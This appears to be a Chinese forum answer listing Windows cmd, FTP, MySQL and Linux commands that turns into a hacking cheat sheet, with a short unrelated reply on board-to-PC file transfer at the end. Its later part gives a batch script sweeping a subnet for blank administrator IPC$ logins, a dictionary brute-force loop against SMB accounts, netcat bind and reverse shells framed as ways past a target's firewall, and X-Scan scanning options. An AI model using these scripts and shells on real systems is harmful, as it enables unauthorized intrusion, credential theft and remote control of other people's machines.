color 顏色值 設置cmd控制台前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠
、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、
D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為:EntSky\ )
print 文件名 列印文本文件
ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息(內存大小、系統版本、補丁版本、計算機名
)
format 盤符 /FS:類型 格式化磁碟,類型:FAT、FAT32、NTFS ,例:Format D:
/FS:NTFS
md 目錄名 創建目錄
replace 源文件 要替換文件的目錄 替換文件
ren 原文件名 新文件名 重命名文件名
tree 以樹形結構顯示出目錄,用參數-f 將列出第個文件夾中文件名稱
type 文件名 顯示文本文件的內容
more 文件名 逐屏顯示輸出文件
doskey 要鎖定的命令=字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行,重新調用win2k命令,
並創建宏)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);
解鎖:doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁碟D並顯示狀態報告;加參數/f並修復磁碟上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務
默認埠23為其它任何埠
exit 退出cmd.exe程序或目前,用參數/B則是退出當前批處理腳本而不是cmd.exe
path 路徑\可執行文件的文件名 為可執行文件設置一個路徑。
cmd 啟動一個win2K命令解釋窗口。參數:/eff、/en 關閉、開啟命令擴展;更我
詳細說明見cmd /?
regedit /s 注冊表文件名 導入注冊表;參數/S指安靜模式導入,無任何提示;
regedit /e 注冊表文件名 導出注冊表
cacls 文件名 參數 顯示或修改文件訪問控制列表(ACL)——針對NTFS格式時
。參數:/D 用戶名:設定拒絕某用戶訪問;/P 用戶名erm 替換指定用戶的訪問
許可權;/G 用戶名erm 賦予指定用戶訪問許可權;Perm 可以是: N 無,R 讀取,
W 寫入, C 更改(寫入),F 完全控制;例:cacls D:\test.txt /D pub 設定
d:\test.txt拒絕pub用戶訪問。
cacls 文件名 查看文件的訪問用戶許可權列表
REM 文本內容 在批處理文件中添加註解
netsh 查看或更改本地網路配置情況
IIS服務命令:
iisreset /reboot 重啟win2k計算機(但有提示系統將重啟信息出現)
iisreset /start或stop 啟動(停止)所有Internet服務
iisreset /restart 停止然後重新啟動所有Internet服務
iisreset /status 顯示所有Internet服務狀態
iisreset /enable或disable 在本地系統上啟用(禁用)Internet服務的重新啟
動
iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時,若發生錯
誤將重新開機
iisreset /noforce 若無法停止Internet服務,將不會強制終止Internet服務
iisreset /timeout Val在到達逾時間(秒)時,仍未停止Internet服務,若指定
/rebootonerror參數,則電腦將會重新開機。預設值為重新啟動20秒,停止60秒
,重新開機0秒。
FTP 命令: (後面有詳細說明內容)
ftp的命令行格式為:
ftp -v -d -i -n -g[主機名] -v 顯示遠程伺服器的所有響應信息。
-d 使用調試方式。
-n 限制ftp的自動登錄,即不使用.netrc文件。
-g 取消全局文件名。
help [命令] 或 ?[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
pwd 列出當前遠端主機目錄
put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端
主機中
get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至
本地主機中
mget [remote-files] 從遠端主機接收一批文件至本地主機
mput local-files 將本地主機中一批文件傳送至遠端主機
dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.
如果有本地文件,就將結果寫至本地文件
ascii 設定以ASCII方式傳送文件(預設值)
bin 或 image 設定以二進制方式傳送文件
bell 每完成一次文件傳送,報警提示
cp 返回上一級目錄
close 中斷與遠程伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器連接,可指定連接埠
delete 刪除遠端主機中的文件
mdelete [remote-files] 刪除一批文件
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的文件名
rmdir directory-name 刪除遠端主機中的目錄
status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以別的用戶名登錄遠端主機
open host [port] 重新建立一個新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作目錄,如果預設,就轉到當前用戶的HOME目錄
chmod 改變遠端主機的文件許可權
case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
cd remote-dir 進入遠程主機目錄
cp 進入遠程主機目錄的父目錄
! 在本地機中執行交互shell,exit回到ftp環境,如!ls*.zip
MYSQL 命令:
mysql -h主機地址 -u用戶名 -p密碼 連接MYSQL;如果剛安裝好MYSQL,超級用戶
root是沒有密碼的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格,其它也一樣)
exit 退出MYSQL
mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼
grant select on 資料庫.* to 用戶名@登錄主機 identified by \"密碼\"; 增
加新用戶。(注意:和上面不同,下面的因為是MYSQL環境中的命令,所以後面都
帶一個分號作為命令結束符)
show databases; 顯示資料庫列表。剛開始時才兩個資料庫:mysql和test。
mysql庫很重要它裡面有MYSQL的系統信息,我們改密碼和新增用戶,實際上就是
用這個庫進行操作。
use mysql;
show tables; 顯示庫中的數據表
describe 表名; 顯示數據表的結構
create database 庫名; 建庫
use 庫名;
create table 表名 (欄位設定列表); 建表
drop database 庫名;
drop table 表名; 刪庫和刪表
delete from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqlmp --opt school>school.bbb 備份資料庫:(命令在DOS的\\mysql\\bin
目錄下執行);注釋:將資料庫school備份到school.bbb文件,school.bbb是一個
文本文件,文件名任取,打開看看你會有新發現。
win2003系統下新增命令(實用部份):
shutdown /參數 關閉或重啟本地或遠程主機。
參數說明:/S 關閉主機,/R 重啟主機, /T 數字 設定延時的時間,范圍0~180
秒之間, /A取消開機,/M //IP 指定的遠程主機。
例:shutdown /r /t 0 立即重啟本地主機(無延時)
taskill /參數 進程名或進程的pid 終止一個或多個任務和進程。
參數說明:/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid,/IM 要
終止的進程的進程名,/F 強制終止進程,/T 終止指定的進程及他所啟動的子進
程。
tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標
識符(PID)。
參數說明:/M 列出當前進程載入的dll文件,/SVC 顯示出每個進程對應的服務,
無參數時就只列出當前的進程。
Linux系統下基本命令: 要區分大小寫
uname 顯示版本信息(同win2K的 ver)
dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件(同win2K的 dir)
pwd 查詢當前所在的目錄位置
cd cd ..回到上一層目錄,注意cd 與..之間有空格。cd /返回到根目錄。
cat 文件名 查看文件內容
cat >abc.txt 往abc.txt文件中寫上內容。
more 文件名 以一頁一頁的方式顯示一個文本文件。
cp 復制文件
mv 移動文件
rm 文件名 刪除文件,rm -a 目錄名刪除目錄及子目錄
mkdir 目錄名 建立目錄
rmdir 刪除子目錄,目錄內沒有文檔。
chmod 設定檔案或目錄的存取許可權
grep 在檔案中查找字元串
diff 檔案文件比較
find 檔案搜尋
date 現在的日期、時間
who 查詢目前和你使用同一台機器的人以及Login時間地點
w 查詢目前上機者的詳細資料
whoami 查看自己的帳號名稱
groups 查看某人的Group
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯C語言寫的文件
su 許可權轉換為指定使用者
telnet IP telnet連接對方主機(同win2K),當出現bash$時就說明連接成功。
ftp ftp連接上某伺服器(同win2K)
附:批處理命令與變數
1:for命令及變數 基本格式:
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:
指定一個單一字母可替換的參數,如:%i ,而指定一個變數則用:%%i ,而調用
變數時用:%i% ,變數是區分大小寫的(%i 不等於 %I)。
批處理每次能處理的變數從%0—%9共10個,其中%0默認給批處理文件名使用,%1
默認為使用此批處理時輸入的的第一個值,同理:%2—%9指輸入的第2-9個值;例
:net use \\ip\ipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3
(set):指定一個或一組文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1
-1 254),{「(1 1 254)」第一個"1"指起始值,第二個"1"指增長量,第三個"254"
指結束值,即:從1到254;「(1 -1 254)」說明:即從254到1}
command:指定對第個文件執行的命令,如:net use命令;如要執行多個命令時
,命令這間加:& 來隔開
command_parameters:為特定命令指定參數或命令行開關
IN (set):指在(set)中取值;DO command :指執行command
參數:/L 指用增量形式{(set)為增量形式時};/F 指從文件中不斷取值,直到取
完為止{(set)為文件時,如(d:\pass.txt)時}。
用法舉例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G
/user:administrator | find "命令成功完成" >>test.txt
存為test.bat 說明:對指定的一個C類網段的254個IP依次試建立administrator
密碼為空的IPC$連接,如果成功就把該IP存在test.txt中。
/L指用增量形式(即從1-254或254-1);輸入的IP前面三位:*.*.*為批處理默認
的 %1;%%G 為變數(ip的最後一位);& 用來隔開echo 和net use 這二個命令;
| 指建立了ipc$後,在結果中用find查看是否有"命令成功完成"信息;%1.%%G 為
完整的IP地址;(1 1 254) 指起始值,增長量,結止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存為:ok.exe 說明:輸入一個IP後,用字典文件d:\pass.dic來暴解d:\user.dic
中的用戶密碼,直到文件中值取完為止。%%i為用戶名;%1為輸入的IP地址(默認
)。
if命令及變數 基本格式:
IF [not] errorlevel 數字 命令語句 如果程序運行最後返回一個等於或大於指
定數字的退出編碼,指定條件為「真」。
例:IF errorlevel 0 命令 指程序執行後返回的值為0時,就值行後面的命令;
IF not errorlevel 1 命令指程序執行最後返回的值不等於1,就執行後面的命令
。
0 指發現並成功執行(真);1 指沒有發現、沒執行(假)。
IF [not] 字元串1==字元串2 命令語句 如果指定的文本字元串匹配(即:字元串
1 等於 字元串2),就執行後面的命令。
例:「if "%2%"=="4" goto start」指:如果輸入的第二個變數為4時,執行後面
的命令(注意:調用變數時就%變數名%並加" ")
IF [not] exist 文件名 命令語句 如果指定的文件名存在,就執行後面的命令。
例:「if not nc.exe goto end」指:如果沒有發現nc.exe文件就跳到":end"標
簽處。
IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字元串1==字
符串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令
語句 加上:else 命令語句後指:當前面的條件不成立時,就指行else後面的命
令。注意:else 必須與 if 在同一行才有效。 當有del命令時需把del命令全部
內容用< >括起來,因為del命令要單獨一行時才能執行,用上< >後就等於是單獨
一行了;例如:「if exist test.txt. else echo
test.txt.missing 」,注意命令中的「.」
(二)系統外部命令(均需下載相關工具):
1、瑞士軍刀:nc.exe
參數說明:
-h 查看幫助信息
-d 後台模式
-e prog程序重定向,一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式,用於入站連接
-L 監聽模式,連接天閉後仍然繼續監聽,直到CTR+C
-n IP地址,不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉(用於掃錨時)
基本用法:
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在
remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的
cmdshell並反向連接192.168.0.2的5354埠
高級用法:
nc -L -p 80 作為蜜罐用1:開啟並不停地監聽80埠,直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2:開啟並不停地監聽80埠,直到
CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1:開啟並不停地監聽80埠,
直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2:開啟並不停地監聽80端
口,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用:nc -l -p 本機埠
在對方主機上用:nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火
牆
本機上用:nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用:nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件
到對方主機
備 註:
| 管道命令
< 或 > 重定向命令。「<」,例如:tlntadmn < test.txt 指把test.txt的內容
賦值給tlntadmn命令
@ 表示執行@後面的命令,但不會顯示出來(後台執行);例:@dir c:\winnt
>> d:\log.txt 意思是:後台執行dir,並把結果存在d:\log.txt中
>與>>的區別 ">"指:覆蓋;">>"指:保存到(添加到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別
執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果
,是因為第二次的結果把第一次的覆蓋了。
2、掃錨工具:xscan.exe
基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止
IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件
名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port 檢測常用服務的埠狀態
我沒有發完 因為超過了9999字 你想看就看吧 不夠的話在我的空間里...
發不完我也沒辦法...
⑸ Linux和開發板之間如何傳輸文件啊我知道可以用insmod載入驅動,但是我得有個.ko文件才行
開發板得成功運行 uboot 。linux得啟動ftp服務 或者nfs服務。uboot 可以支持ftp 或者nfs下載。開發板和pc之間有兩個連接:1.得用網線連接 開發板 和pc。2.用linux的 minicom 軟體和開發板進行 串口通訊。不是一兩句話能解決的。
串口通訊也可以傳輸文件搜索這個文章:使用uboot + minicom串口協議下載鏡像文件